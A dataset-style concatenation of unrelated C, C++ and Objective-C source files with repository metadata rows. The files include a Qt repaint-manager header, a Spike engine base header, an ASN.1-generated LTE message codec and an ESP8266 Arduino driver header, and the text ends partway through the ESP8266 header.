enum BufferState{
BufferValid,
BufferInvalid
};
Q_ENUM(BufferState)
QWidgetRepaintManager(QWidget *t);
~QWidgetRepaintManager();
QBackingStore *backingStore() const { return store; }
void setBackingStore(QBackingStore *backingStore) { store = backingStore; }
template <class T>
void markDirty(const T &r, QWidget *widget, UpdateTime updateTime = UpdateLater,
BufferState bufferState = BufferValid);
void removeDirtyWidget(QWidget *w);
void sync(QWidget *exposedWidget, const QRegion &exposedRegion);
void sync();
void markNeedsFlush(QWidget *widget, const QRegion ®ion, const QPoint &topLevelOffset);
void addStaticWidget(QWidget *widget);
void moveStaticWidgets(QWidget *reparented);
void removeStaticWidget(QWidget *widget);
QRegion staticContents(QWidget *widget = nullptr, const QRect &withinClipRect = QRect()) const;
bool bltRect(const QRect &rect, int dx, int dy, QWidget *widget);
private:
void updateLists(QWidget *widget);
void addDirtyWidget(QWidget *widget, const QRegion &rgn);
void resetWidget(QWidget *widget);
void addDirtyRenderToTextureWidget(QWidget *widget);
void sendUpdateRequest(QWidget *widget, UpdateTime updateTime);
bool syncAllowed();
void paintAndFlush();
void markNeedsFlush(QWidget *widget, const QRegion ®ion = QRegion());
void flush();
void flush(QWidget *widget, const QRegion ®ion, QPlatformTextureList *widgetTextures);
bool isDirty() const;
bool hasStaticContents() const;
void updateStaticContentsSize();
QWidget *tlw = nullptr;
QBackingStore *store = nullptr;
QRegion dirty; // needsRepaint
QVector<QWidget *> dirtyWidgets;
QVector<QWidget *> dirtyRenderToTextureWidgets;
QRegion topLevelNeedsFlush;
QVector<QWidget *> needsFlushWidgets;
QList<QWidget *> staticWidgets;
QPlatformTextureListWatcher *textureListWatcher = nullptr;
bool updateRequestSent = false;
QElapsedTimer perfTime;
int perfFrames = 0;
Q_DISABLE_COPY_MOVE(QWidgetRepaintManager)
};
QT_END_NAMESPACE
#endif // QWIDGETREPAINTMANAGER_P_H
| 32.590909 | 100 | 0.690974 |
c3976d68b326fb6d27a5c4c7bf643bf8af707ada | 867 | h | C | Yo/Controllers/YoContact.h | KJtheHack/yo-ios | 01487e3c3d3bcded417ea867a5e85b5fd0ffabaa | [
"MIT"
] | 2 | 2021-12-17T03:25:59.000Z | 2022-01-14T14:09:33.000Z | Yo/Controllers/YoContact.h | KJtheHack/yo-ios | 01487e3c3d3bcded417ea867a5e85b5fd0ffabaa | [
"MIT"
] | null | null | null | Yo/Controllers/YoContact.h | KJtheHack/yo-ios | 01487e3c3d3bcded417ea867a5e85b5fd0ffabaa | [
"MIT"
] | 1 | 2022-01-14T14:11:52.000Z | 2022-01-14T14:11:52.000Z | //
// YoContact.h
// Yo
//
// Created by Peter Reveles on 6/1/15.
//
//
#import <Foundation/Foundation.h>
// @or: a YoContact can be either a Yo user or just a phone contact
// this class is used to present the list in add friends and add group members
@interface YoContact : NSObject
extern NSString *const YoUserTypeRegular;
extern NSString *const YoUserTypePseudo;
@property (nonatomic, strong) NSString *fullName;
@property (nonatomic, strong) NSString *username;
@property (nonatomic, strong) NSString *phoneNumber;
@property (nonatomic, strong) NSString *userType; // @or: "user" or "pseudo_user"
@property (nonatomic, strong) NSString *source;
@property (nonatomic, assign) NSInteger yoCount;
@property (nonatomic, strong) NSDate *lastSeenDate;
- (void)fillWithUser:(YoUser *)user;
- (void)fillWithDictionary:(NSDictionary *)contactDictionary;
@end
| 27.09375 | 81 | 0.747405 |
baf76fed34552632ecaac6c766c3d4046a167fbc | 3,012 | h | C | Spike/src/Spike/Core/Base.h | BEASTSM96/Spike | 6d94889b3e5b3019a72a030f39b092162c865f54 | [
"Apache-2.0"
] | 1 | 2021-05-25T23:31:53.000Z | 2021-05-25T23:31:53.000Z | Spike/src/Spike/Core/Base.h | BEASTSM96/Spike | 6d94889b3e5b3019a72a030f39b092162c865f54 | [
"Apache-2.0"
] | null | null | null | Spike/src/Spike/Core/Base.h | BEASTSM96/Spike | 6d94889b3e5b3019a72a030f39b092162c865f54 | [
"Apache-2.0"
] | 1 | 2021-06-17T17:58:41.000Z | 2021-06-17T17:58:41.000Z | /*****************************************************************************/
/* Spike SourceCode */
/* */
/* File created by: Fahim Fuad */
/* Other editors: None */
/* */
/* Licensed under the Apache License, Version 2.0 (the "License"); */
/* you may not use this file except in compliance with the License. */
/* You may obtain a copy of the License at */
/* */
/* http://www.apache.org/licenses/LICENSE-2.0 */
/* */
/* Unless required by applicable law or agreed to in writing, software */
/* distributed under the License is distributed on an "AS IS" BASIS, */
/* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.*/
/* See the License for the specific language governing permissions and */
/* limitations under the License. */
/*****************************************************************************/
#pragma once
#include <memory>
#include "Spike/Core/PlatformDetection.h"
#ifdef SPK_DEBUG
#if defined(SPK_PLATFORM_WINDOWS)
#define SPK_DEBUGBREAK() __debugbreak()
#elif defined(SPK_PLATFORM_LINUX)
#include<signal.h>
#define SPK_DEBUGBREAK() raise(SIGTRAP)
#else
#error "Spike doesn't support debugbreak on this platform!"
#endif
#define SPK_ENABSPK_ASSERTS
#else
#define SPK_DEBUGBREAK()
#endif
#ifdef SPK_ENABSPK_ASSERTS
#define SPK_ASSERT(x, ...) { if(!(x)) { SPK_LOG_ERROR("Assertion Failed: {0}", __VA_ARGS__); SPK_DEBUGBREAK(); } }
#define SPK_CORE_ASSERT(x, ...) { if(!(x)) { SPK_CORE_LOG_ERROR("Assertion Failed: {0}", __VA_ARGS__); SPK_DEBUGBREAK(); } }
#define SPK_INTERNAL_ASSERT(x) { SPK_CORE_LOG_CRITICAL(x); SPK_DEBUGBREAK(); }
#else
#define SPK_ASSERT(x, ...)
#define SPK_CORE_ASSERT(x, ...)
#define SPK_INTERNAL_ASSERT(...)
#endif
#define BIT(x) (1 << x)
#define SPK_BIND_EVENT_FN(fn) [this](auto&&... args)->decltype(auto) { return this->fn(std::forward<decltype(args)>(args)...); }
namespace Spike
{
template<typename T>
using Scope = std::unique_ptr<T>;
template<typename T, typename ... Args>
constexpr Scope<T> CreateScope(Args&& ... args)
{
return std::make_unique<T>(std::forward<Args>(args)...);
}
template<typename T>
using Ref = std::shared_ptr<T>;
template<typename T, typename ... Args>
constexpr Ref<T> CreateRef(Args&& ... args)
{
return std::make_shared<T>(std::forward<Args>(args)...);
}
}
| 43.652174 | 128 | 0.49668 |
c99ddc7ac3deadead0c1967ca82a284530b9f8db | 561 | h | C | net/tapi/rtc/phoenix/src/inc/rtcdib.h | npocmaka/Windows-Server-2003 | 5c6fe3db626b63a384230a1aa6b92ac416b0765f | [
"Unlicense"
] | 17 | 2020-11-13T13:42:52.000Z | 2021-09-16T09:13:13.000Z | net/tapi/rtc/phoenix/src/inc/rtcdib.h | sancho1952007/Windows-Server-2003 | 5c6fe3db626b63a384230a1aa6b92ac416b0765f | [
"Unlicense"
] | 2 | 2020-10-19T08:02:06.000Z | 2020-10-19T08:23:18.000Z | net/tapi/rtc/phoenix/src/inc/rtcdib.h | sancho1952007/Windows-Server-2003 | 5c6fe3db626b63a384230a1aa6b92ac416b0765f | [
"Unlicense"
] | 14 | 2020-11-14T09:43:20.000Z | 2021-08-28T08:59:57.000Z | /*++
Copyright (c) 2000 Microsoft Corporation
Module Name:
rtcdib.h
Abstract:
DIB helpers, copied from NT source tree
--*/
#pragma once
//
// Dib helpers
//
WORD DibNumColors(VOID FAR * pv);
HANDLE DibFromBitmap(HBITMAP hbm, DWORD biStyle, WORD biBits, HPALETTE hpal, UINT wUsage);
BOOL DibBlt(HDC hdc, int x0, int y0, int dx, int dy, HANDLE hdib, int x1, int y1, LONG rop, UINT wUsage);
UINT PaletteSize(VOID FAR * pv);
#define WIDTHBYTES(i) ((i+31)/32*4) /* ULONG aligned ! */ | 20.035714 | 113 | 0.607843 |
3af3d482a2b712f6445f845cb6aac9a182d4a2ea | 895 | h | C | cpp/src/main/offline_evaluators/OfflineRankingComputer.h | rpalovics/Alpenglow | 63472ce667d517d6c7f47c9d0559861392fca3f9 | [
"Apache-2.0"
] | 28 | 2017-07-23T22:47:44.000Z | 2022-03-12T15:11:13.000Z | cpp/src/main/offline_evaluators/OfflineRankingComputer.h | proto-n/Alpenglow | 7a15d5c57b511787379f095e7310e67423159fa0 | [
"Apache-2.0"
] | 4 | 2017-05-10T10:23:17.000Z | 2019-05-23T14:07:09.000Z | cpp/src/main/offline_evaluators/OfflineRankingComputer.h | proto-n/Alpenglow | 7a15d5c57b511787379f095e7310e67423159fa0 | [
"Apache-2.0"
] | 9 | 2017-05-04T09:20:58.000Z | 2021-12-14T08:19:01.000Z | #ifndef OFFLINE_RANKING_COMPUTER_H
#define OFFLINE_RANKING_COMPUTER_H
#include "../utils/ToplistCreator.h"
struct OfflineRankingComputerParameters {
int top_k;
};
struct OfflinePredictions{
vector<int> users;
vector<int> items;
vector<int> ranks;
vector<double> scores;
};
class OfflineRankingComputer{
public:
OfflineRankingComputer(OfflineRankingComputerParameters* params){
top_k_ = params->top_k;
}
void set_toplist_creator(ToplistCreatorPersonalized* toplist_creator){
toplist_creator_ = toplist_creator;
}
void set_items(vector<int>* items){items_ = items;}
void set_users(vector<int>* users){users_ = users;}
OfflinePredictions compute();
private:
int top_k_;
vector<int> *items_ = NULL;
vector<int> *users_ = NULL;
ToplistCreatorPersonalized* toplist_creator_ = NULL;
};
#endif /* OFFLINE_RANKING_COMPUTER_H */
| 24.189189 | 74 | 0.735196 |
68988c7ffd20116d52ecc8723b1a8a52c2f58416 | 178 | h | C | GCN_Loop_ColdBreath_V2_classes.h | NotDiscordOfficial/Fortnite_SDK | 58f8da148256f99cb35518003306fffee33c4a21 | [
"MIT"
] | null | null | null | GCN_Loop_ColdBreath_V2_classes.h | NotDiscordOfficial/Fortnite_SDK | 58f8da148256f99cb35518003306fffee33c4a21 | [
"MIT"
] | null | null | null | GCN_Loop_ColdBreath_V2_classes.h | NotDiscordOfficial/Fortnite_SDK | 58f8da148256f99cb35518003306fffee33c4a21 | [
"MIT"
] | 1 | 2021-07-22T00:31:44.000Z | 2021-07-22T00:31:44.000Z | // BlueprintGeneratedClass GCN_Loop_ColdBreath_V2.GCN_Loop_ColdBreath_V2_C
// Size: 0x7d0 (Inherited: 0x7d0)
struct AGCN_Loop_ColdBreath_V2_C : AFortGameplayCueNotify_Loop {
};
| 29.666667 | 74 | 0.842697 |
71b0870486c24d93bca2130b51e164ab8dd307fc | 1,069 | h | C | test/ReflectedClass.h | daewoong-jang/reflect | b5330ad96844f08a6529a8d21302ed52148ebd4a | [
"BSD-3-Clause"
] | 35 | 2016-12-20T15:49:47.000Z | 2021-12-23T08:54:14.000Z | test/ReflectedClass.h | daewoong-jang/reflect | b5330ad96844f08a6529a8d21302ed52148ebd4a | [
"BSD-3-Clause"
] | 1 | 2020-02-15T22:08:25.000Z | 2021-08-06T08:32:38.000Z | test/ReflectedClass.h | naver/reflect | b5330ad96844f08a6529a8d21302ed52148ebd4a | [
"BSD-3-Clause"
] | 9 | 2016-12-06T13:06:00.000Z | 2021-05-30T17:32:56.000Z |
#ifndef REFLECT_TEST_ReflectedClass_h
#define REFLECT_TEST_ReflectedClass_h
#include "Class.h"
class Reflected {
public:
Reflected();
~Reflected() = default;
void testMethod();
bool testMethodWithReturnValue();
void testMethodNumberValue(int);
void testMethodNumberReference(int&);
void testMethodNumberConstValue(const int);
void testMethodNumberConstReference(const int&);
void testMethodNumberPointer(int*);
void testMethodNumberConstPointer(const int*);
void testMethodNumberRValueReference(int&&);
void testMethodStringValue(std::string);
void testMethodStringReference(std::string&);
void testMethodPairValue(std::pair<int, float>);
void testMethodPairReference(std::pair<int, float>&);
void testMethodObject(std::shared_ptr<void>);
void testMethodCallback(std::function<int (int)>);
static void staticMethod();
static void staticMethodWithParameters(int);
int m_intField;
static int m_staticInt;
};
TYPE_DESCRIPTOR(Reflected);
#endif // REFLECT_TEST_ReflectedClass_h
| 26.073171 | 57 | 0.747428 |
7b00a1356fb7dfd76773f2ad9a710da5dcacf6e5 | 7,027 | h | C | include/MCIAudio.h | zmcj21/MCIAudio | 75e112d81476f08ee75a2d5bcb3c1cb563b7080d | [
"MIT"
] | null | null | null | include/MCIAudio.h | zmcj21/MCIAudio | 75e112d81476f08ee75a2d5bcb3c1cb563b7080d | [
"MIT"
] | null | null | null | include/MCIAudio.h | zmcj21/MCIAudio | 75e112d81476f08ee75a2d5bcb3c1cb563b7080d | [
"MIT"
] | null | null | null | //Author:zmcj21
//Date:2021/12/29
//License:MIT
//Repo:https://github.com/zmcj21/MCIAudio
//本项目基于以下文档开发:
//Microsoft MCI Document:https://docs.microsoft.com/en-us/windows/win32/multimedia/mci
#pragma once
//Enable Unicode
#if !defined(UNICODE)
#define UNICODE
#endif
//Reduces the size of the Win32 header files by excluding some of the less frequently used APIs
#define WIN32_LEAN_AND_MEAN
//include Windows.h first
#include <Windows.h>
//Provide MCI interface, mmsystem header file depends on Windows.h
#include <mmsystem.h>
//C++ headers:
#include <string>
namespace MCIAudio
{
class Audio
{
public:
static std::wstring MCIAlias;
static int MCIAliasCounter;
public:
static void MCISendString(const std::wstring& s);
static std::wstring MCISendStringEx(const std::wstring& s);
static std::wstring MCIGetErrorString(MCIERROR err);
//tool functions:
public:
static std::wstring _GetShortPathName(const std::wstring& path);
static std::wstring _FormatLastErrorMsg();
static std::wstring _GetFileExtension(const std::wstring& path);
static std::wstring _GetDirectoryPath();
public:
std::wstring path; //Absolute path
std::wstring shortPath; //Short path
std::wstring extension; //Extension of file
std::wstring alias; //Unique alias
int totalMilliSecond; //Total milliSecond of this audio
int minute; //Minute part of this audio
int second; //Second part of this audio
int milliSecond; //MilliSecond part of this audio
public:
Audio();
Audio(const std::wstring& path);
~Audio();
void Open(const std::wstring& path);
void Close();
void Play(bool repeat = false, bool wait = false);
void PlayEx(int from, int to, bool repeat = false, bool wait = false);
void Stop();
void Pause();
void Resume();
};
}
#ifdef MCI_AUDIO
//link input
#pragma comment(lib, "winmm.lib")
//Each string that MCI returns, whether data or an error description, can be a maximum of 128 characters.
#ifndef MCI_ERR_BUFFER_SIZE
#define MCI_ERR_BUFFER_SIZE 128
#endif
//just set it to 128 :)
#ifndef MCI_MSG_BUFFER_SIZE
#define MCI_MSG_BUFFER_SIZE 128
#endif
#ifndef MCI_UNKNOWN_EXCEPTION
#define MCI_UNKNOWN_EXCEPTION "Unknown MCI Exception"
#endif
namespace MCIAudio
{
std::wstring Audio::MCIAlias = L"MCI_ALIAS_";
int Audio::MCIAliasCounter = 1;
void Audio::MCISendString(const std::wstring& s)
{
MCIERROR err = mciSendString(s.c_str(), nullptr, 0, nullptr);
if (err != 0)
{
std::wstring err_msg = MCIGetErrorString(err);
throw err_msg;
}
}
std::wstring Audio::MCISendStringEx(const std::wstring& s)
{
WCHAR buf[MCI_MSG_BUFFER_SIZE];
MCIERROR err = mciSendString(s.c_str(), buf, MCI_MSG_BUFFER_SIZE, nullptr);
if (err == 0)
{
return std::wstring(buf);
}
else
{
std::wstring err_msg = MCIGetErrorString(err);
throw err_msg;
}
}
std::wstring Audio::MCIGetErrorString(MCIERROR err)
{
WCHAR buf[MCI_ERR_BUFFER_SIZE];
bool suc = mciGetErrorString(err, buf, MCI_ERR_BUFFER_SIZE);
if (suc)
{
return std::wstring(buf);
}
else
{
throw MCI_UNKNOWN_EXCEPTION;
}
}
std::wstring Audio::_GetShortPathName(const std::wstring& path)
{
WCHAR buf[MAX_PATH];
bool suc = GetShortPathName(path.c_str(), buf, MAX_PATH);
if (suc)
{
return std::wstring(buf);
}
else
{
throw _FormatLastErrorMsg();
}
}
std::wstring Audio::_FormatLastErrorMsg()
{
WCHAR buf[MAX_PATH];
bool suc = FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM, nullptr, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), buf, MAX_PATH, nullptr);
if (suc)
{
return std::wstring(buf);
}
else
{
throw MCI_UNKNOWN_EXCEPTION;
}
}
std::wstring Audio::_GetFileExtension(const std::wstring& path)
{
std::wstring extension;
size_t pos = path.find_last_of(L'.');
if (pos == std::wstring::npos)
{
return extension;
}
extension = path.substr(pos + 1);
return extension;
}
std::wstring Audio::_GetDirectoryPath()
{
std::wstring path;
WCHAR buffer[MAX_PATH];
::GetModuleFileName(NULL, buffer, MAX_PATH);
path = buffer;
int index = path.find_last_of(L'\\');
std::wstring directory_path = path.substr(0, index + 1);
return directory_path;
}
Audio::Audio()
{
}
Audio::Audio(const std::wstring& path)
{
Open(path);
}
Audio::~Audio()
{
Close();
}
void Audio::Open(const std::wstring& path)
{
//必须将路径转成ShortPath, 否则MCI可能无法识别并出现错误代码263
std::wstring shortPathName = _GetShortPathName(path);
std::wstring alias = MCIAlias + std::to_wstring(MCIAliasCounter++);
MCISendString(L"open " + shortPathName + L" alias " + alias);
this->path = path;
this->shortPath = shortPathName;
this->extension = _GetFileExtension(path);
this->alias = alias;
std::wstring length_s = MCISendStringEx(L"status " + alias + L" length");
this->totalMilliSecond = _wtoi(length_s.c_str());
this->minute = totalMilliSecond / 1000 / 60;
this->second = totalMilliSecond / 1000 - minute * 60;
this->milliSecond = totalMilliSecond % 1000;
}
void Audio::Close()
{
MCISendString(L"close " + this->alias);
}
void Audio::Play(bool repeat, bool wait)
{
PlayEx(0, this->totalMilliSecond, repeat, wait);
}
void Audio::PlayEx(int from, int to, bool repeat, bool wait)
{
std::wstring cmd = L"play " + this->alias;
//from x ms to y ms
cmd += L" from " + std::to_wstring(from) + L" to " + std::to_wstring(to);
//NOTICE:if play .wav music, repeat is useless. If file is .wav and repeat is on, it will fail. Seems it's a bug in MCI.
if (repeat && this->extension.compare(L".wav") != 0)
{
cmd += L" repeat";
}
//wait will block the thread.
if (wait)
{
cmd += L" wait";
}
MCISendString(cmd);
}
void Audio::Stop()
{
std::wstring cmd = L"stop " + this->alias;
MCISendString(cmd);
}
void Audio::Pause()
{
std::wstring cmd = L"pause " + this->alias;
MCISendString(cmd);
}
void Audio::Resume()
{
std::wstring cmd = L"resume " + this->alias;
MCISendString(cmd);
}
}
#endif
| 24.231034 | 153 | 0.587021 |
7d748828104bcb8cf7f33a854c57d1d5b81dd23d | 1,247 | h | C | lib/utils/util.h | james-s-willis/kotekan | 155e874bb039702cec72c1785362a017548aa00a | [
"MIT"
] | null | null | null | lib/utils/util.h | james-s-willis/kotekan | 155e874bb039702cec72c1785362a017548aa00a | [
"MIT"
] | null | null | null | lib/utils/util.h | james-s-willis/kotekan | 155e874bb039702cec72c1785362a017548aa00a | [
"MIT"
] | null | null | null | #ifndef UTIL_H
#define UTIL_H
#define EVER ;;
#ifndef MAC_OSX
#define MIN(a,b) \
({ __typeof__ (a) _a = (a); \
__typeof__ (b) _b = (b); \
_a < _b ? _a : _b; })
#endif
#ifdef __cplusplus
#include <string>
/**
* @brief Returns the last N characters of a string
*
* @param str The string to get the last characters from
* @param N The number of characters to take form the end of the string
* @return std::string
*/
inline std::string string_tail(std::string const& str, size_t const N) {
if (N >= str.size()) {
return str;
}
return str.substr(str.size() - N);
}
#endif
#ifdef __cplusplus
extern "C" {
#endif
void make_rfi_dirs(int streamID, const char * write_to, const char* time_dir);
void make_dirs(char * disk_base, char * data_set, int num_disks);
void make_raw_dirs(const char * disk_base, const char * disk_set, const char * data_set, int num_disks);
int cp(const char *to, const char *from);
int64_t mod(int64_t a, int64_t b);
double e_time(void);
void hex_dump (const int rows, void *addr, int len);
//! A complex integer datatype.
typedef struct {
int32_t real; //!< The real component.
int32_t imag; //!< The imaginary component.
} complex_int_t;
#ifdef __cplusplus
}
#endif
#endif
| 22.672727 | 104 | 0.677626 |
9a495dde5b6d8ad09df3a093b782051bae634efe | 6,829 | c | C | cmake_targets/lte_build_oai/build/CMakeFiles/Rel14/SBCCH-SL-BCH-MessageType-V2X-r14.c | davidraditya/OAI-Powder | a082c3e8af06cd7583c003a69ec517eb73d175b3 | [
"Apache-2.0"
] | null | null | null | cmake_targets/lte_build_oai/build/CMakeFiles/Rel14/SBCCH-SL-BCH-MessageType-V2X-r14.c | davidraditya/OAI-Powder | a082c3e8af06cd7583c003a69ec517eb73d175b3 | [
"Apache-2.0"
] | null | null | null | cmake_targets/lte_build_oai/build/CMakeFiles/Rel14/SBCCH-SL-BCH-MessageType-V2X-r14.c | davidraditya/OAI-Powder | a082c3e8af06cd7583c003a69ec517eb73d175b3 | [
"Apache-2.0"
] | null | null | null | /*
* Generated by asn1c-0.9.24 (http://lionet.info/asn1c)
* From ASN.1 module "PC5-RRC-Definitions"
* found in "fixed_grammar.asn"
* `asn1c -gen-PER`
*/
#include "SBCCH-SL-BCH-MessageType-V2X-r14.h"
int
SBCCH_SL_BCH_MessageType_V2X_r14_constraint(asn_TYPE_descriptor_t *td, const void *sptr,
asn_app_constraint_failed_f *ctfailcb, void *app_key) {
/* Replace with underlying type checker */
td->check_constraints = asn_DEF_MasterInformationBlock_SL_V2X_r14.check_constraints;
return td->check_constraints(td, sptr, ctfailcb, app_key);
}
/*
* This type is implemented using MasterInformationBlock_SL_V2X_r14,
* so here we adjust the DEF accordingly.
*/
static void
SBCCH_SL_BCH_MessageType_V2X_r14_1_inherit_TYPE_descriptor(asn_TYPE_descriptor_t *td) {
td->free_struct = asn_DEF_MasterInformationBlock_SL_V2X_r14.free_struct;
td->print_struct = asn_DEF_MasterInformationBlock_SL_V2X_r14.print_struct;
td->ber_decoder = asn_DEF_MasterInformationBlock_SL_V2X_r14.ber_decoder;
td->der_encoder = asn_DEF_MasterInformationBlock_SL_V2X_r14.der_encoder;
td->xer_decoder = asn_DEF_MasterInformationBlock_SL_V2X_r14.xer_decoder;
td->xer_encoder = asn_DEF_MasterInformationBlock_SL_V2X_r14.xer_encoder;
td->uper_decoder = asn_DEF_MasterInformationBlock_SL_V2X_r14.uper_decoder;
td->uper_encoder = asn_DEF_MasterInformationBlock_SL_V2X_r14.uper_encoder;
td->aper_decoder = asn_DEF_MasterInformationBlock_SL_V2X_r14.aper_decoder;
td->aper_encoder = asn_DEF_MasterInformationBlock_SL_V2X_r14.aper_encoder;
td->compare = asn_DEF_MasterInformationBlock_SL_V2X_r14.compare;
if(!td->per_constraints)
td->per_constraints = asn_DEF_MasterInformationBlock_SL_V2X_r14.per_constraints;
td->elements = asn_DEF_MasterInformationBlock_SL_V2X_r14.elements;
td->elements_count = asn_DEF_MasterInformationBlock_SL_V2X_r14.elements_count;
td->specifics = asn_DEF_MasterInformationBlock_SL_V2X_r14.specifics;
}
void
SBCCH_SL_BCH_MessageType_V2X_r14_free(asn_TYPE_descriptor_t *td,
void *struct_ptr, int contents_only) {
SBCCH_SL_BCH_MessageType_V2X_r14_1_inherit_TYPE_descriptor(td);
td->free_struct(td, struct_ptr, contents_only);
}
int
SBCCH_SL_BCH_MessageType_V2X_r14_print(asn_TYPE_descriptor_t *td, const void *struct_ptr,
int ilevel, asn_app_consume_bytes_f *cb, void *app_key) {
SBCCH_SL_BCH_MessageType_V2X_r14_1_inherit_TYPE_descriptor(td);
return td->print_struct(td, struct_ptr, ilevel, cb, app_key);
}
asn_dec_rval_t
SBCCH_SL_BCH_MessageType_V2X_r14_decode_ber(asn_codec_ctx_t *opt_codec_ctx, asn_TYPE_descriptor_t *td,
void **structure, const void *bufptr, size_t size, int tag_mode) {
SBCCH_SL_BCH_MessageType_V2X_r14_1_inherit_TYPE_descriptor(td);
return td->ber_decoder(opt_codec_ctx, td, structure, bufptr, size, tag_mode);
}
asn_enc_rval_t
SBCCH_SL_BCH_MessageType_V2X_r14_encode_der(asn_TYPE_descriptor_t *td,
void *structure, int tag_mode, ber_tlv_tag_t tag,
asn_app_consume_bytes_f *cb, void *app_key) {
SBCCH_SL_BCH_MessageType_V2X_r14_1_inherit_TYPE_descriptor(td);
return td->der_encoder(td, structure, tag_mode, tag, cb, app_key);
}
asn_dec_rval_t
SBCCH_SL_BCH_MessageType_V2X_r14_decode_xer(asn_codec_ctx_t *opt_codec_ctx, asn_TYPE_descriptor_t *td,
void **structure, const char *opt_mname, const void *bufptr, size_t size) {
SBCCH_SL_BCH_MessageType_V2X_r14_1_inherit_TYPE_descriptor(td);
return td->xer_decoder(opt_codec_ctx, td, structure, opt_mname, bufptr, size);
}
asn_enc_rval_t
SBCCH_SL_BCH_MessageType_V2X_r14_encode_xer(asn_TYPE_descriptor_t *td, void *structure,
int ilevel, enum xer_encoder_flags_e flags,
asn_app_consume_bytes_f *cb, void *app_key) {
SBCCH_SL_BCH_MessageType_V2X_r14_1_inherit_TYPE_descriptor(td);
return td->xer_encoder(td, structure, ilevel, flags, cb, app_key);
}
asn_dec_rval_t
SBCCH_SL_BCH_MessageType_V2X_r14_decode_uper(asn_codec_ctx_t *opt_codec_ctx, asn_TYPE_descriptor_t *td,
asn_per_constraints_t *constraints, void **structure, asn_per_data_t *per_data) {
SBCCH_SL_BCH_MessageType_V2X_r14_1_inherit_TYPE_descriptor(td);
return td->uper_decoder(opt_codec_ctx, td, constraints, structure, per_data);
}
asn_enc_rval_t
SBCCH_SL_BCH_MessageType_V2X_r14_encode_uper(asn_TYPE_descriptor_t *td,
asn_per_constraints_t *constraints,
void *structure, asn_per_outp_t *per_out) {
SBCCH_SL_BCH_MessageType_V2X_r14_1_inherit_TYPE_descriptor(td);
return td->uper_encoder(td, constraints, structure, per_out);
}
asn_enc_rval_t
SBCCH_SL_BCH_MessageType_V2X_r14_encode_aper(asn_TYPE_descriptor_t *td,
asn_per_constraints_t *constraints,
void *structure, asn_per_outp_t *per_out) {
SBCCH_SL_BCH_MessageType_V2X_r14_1_inherit_TYPE_descriptor(td);
return td->aper_encoder(td, constraints, structure, per_out);
}
asn_comp_rval_t *
SBCCH_SL_BCH_MessageType_V2X_r14_compare(asn_TYPE_descriptor_t *td1,
const void *structure1,
asn_TYPE_descriptor_t *td2,
const void *structure2) {
asn_comp_rval_t * res = NULL;
SBCCH_SL_BCH_MessageType_V2X_r14_1_inherit_TYPE_descriptor(td1);
SBCCH_SL_BCH_MessageType_V2X_r14_1_inherit_TYPE_descriptor(td2);
res = td1->compare(td1, structure1, td2, structure2);
return res;
}
asn_dec_rval_t
SBCCH_SL_BCH_MessageType_V2X_r14_decode_aper(asn_codec_ctx_t *opt_codec_ctx, asn_TYPE_descriptor_t *td,
asn_per_constraints_t *constraints, void **structure, asn_per_data_t *per_data) {
SBCCH_SL_BCH_MessageType_V2X_r14_1_inherit_TYPE_descriptor(td);
return td->aper_decoder(opt_codec_ctx, td, constraints, structure, per_data);
}
static ber_tlv_tag_t asn_DEF_SBCCH_SL_BCH_MessageType_V2X_r14_tags_1[] = {
(ASN_TAG_CLASS_UNIVERSAL | (16 << 2))
};
asn_TYPE_descriptor_t asn_DEF_SBCCH_SL_BCH_MessageType_V2X_r14 = {
"SBCCH-SL-BCH-MessageType-V2X-r14",
"SBCCH-SL-BCH-MessageType-V2X-r14",
SBCCH_SL_BCH_MessageType_V2X_r14_free,
SBCCH_SL_BCH_MessageType_V2X_r14_print,
SBCCH_SL_BCH_MessageType_V2X_r14_constraint,
SBCCH_SL_BCH_MessageType_V2X_r14_decode_ber,
SBCCH_SL_BCH_MessageType_V2X_r14_encode_der,
SBCCH_SL_BCH_MessageType_V2X_r14_decode_xer,
SBCCH_SL_BCH_MessageType_V2X_r14_encode_xer,
SBCCH_SL_BCH_MessageType_V2X_r14_decode_uper,
SBCCH_SL_BCH_MessageType_V2X_r14_encode_uper,
SBCCH_SL_BCH_MessageType_V2X_r14_decode_aper,
SBCCH_SL_BCH_MessageType_V2X_r14_encode_aper,
SBCCH_SL_BCH_MessageType_V2X_r14_compare,
0, /* Use generic outmost tag fetcher */
asn_DEF_SBCCH_SL_BCH_MessageType_V2X_r14_tags_1,
sizeof(asn_DEF_SBCCH_SL_BCH_MessageType_V2X_r14_tags_1)
/sizeof(asn_DEF_SBCCH_SL_BCH_MessageType_V2X_r14_tags_1[0]), /* 1 */
asn_DEF_SBCCH_SL_BCH_MessageType_V2X_r14_tags_1, /* Same as above */
sizeof(asn_DEF_SBCCH_SL_BCH_MessageType_V2X_r14_tags_1)
/sizeof(asn_DEF_SBCCH_SL_BCH_MessageType_V2X_r14_tags_1[0]), /* 1 */
0, /* No PER visible constraints */
0, 0, /* Defined elsewhere */
0 /* No specifics */
};
| 43.221519 | 103 | 0.833943 |
a4386e68344c469a0193a3e5fac9c3860d965648 | 15,899 | h | C | Arduino/XDR/ESP8266.h | gabriserra/XDR-eXtended-Data-Recorder | 37c78efa11e09dbd310f6158b2c646ce5907dd52 | [
"Apache-2.0"
] | null | null | null | Arduino/XDR/ESP8266.h | gabriserra/XDR-eXtended-Data-Recorder | 37c78efa11e09dbd310f6158b2c646ce5907dd52 | [
"Apache-2.0"
] | null | null | null | Arduino/XDR/ESP8266.h | gabriserra/XDR-eXtended-Data-Recorder | 37c78efa11e09dbd310f6158b2c646ce5907dd52 | [
"Apache-2.0"
] | null | null | null | #ifndef __ESP8266_H__
#define __ESP8266_H__
#include "SoftwareSerial.h"
//------------------------------------------------------------------------------
// GLOBAL CONSTANTS
//------------------------------------------------------------------------------
#define MAX_BUFFER_SIZE 300
#define DEF_BAUDRATE 9600
#define DEF_TIMEOUT 1000
//------------------------------------------------------------------------------
// CLASS DEFINITION
//------------------------------------------------------------------------------
class ESP8266 {
//--------------------------------------------------------------------------
// PRIVATE MEMBERS AND FUNCTIONS
//--------------------------------------------------------------------------
private:
//----------------------------------------------------------------------
// PRIVATE MEMBERS
//----------------------------------------------------------------------
SoftwareSerial * m_puart;
uint8_t m_responseBuffer[MAX_BUFFER_SIZE] = {0};
//----------------------------------------------------------------------
// PRIVATE FUNCTIONS
//----------------------------------------------------------------------
//----------------------------------------------------------------------
// RX EMPTY: Empty the buffer or UART RX
//----------------------------------------------------------------------
void rx_empty(void);
//----------------------------------------------------------------------
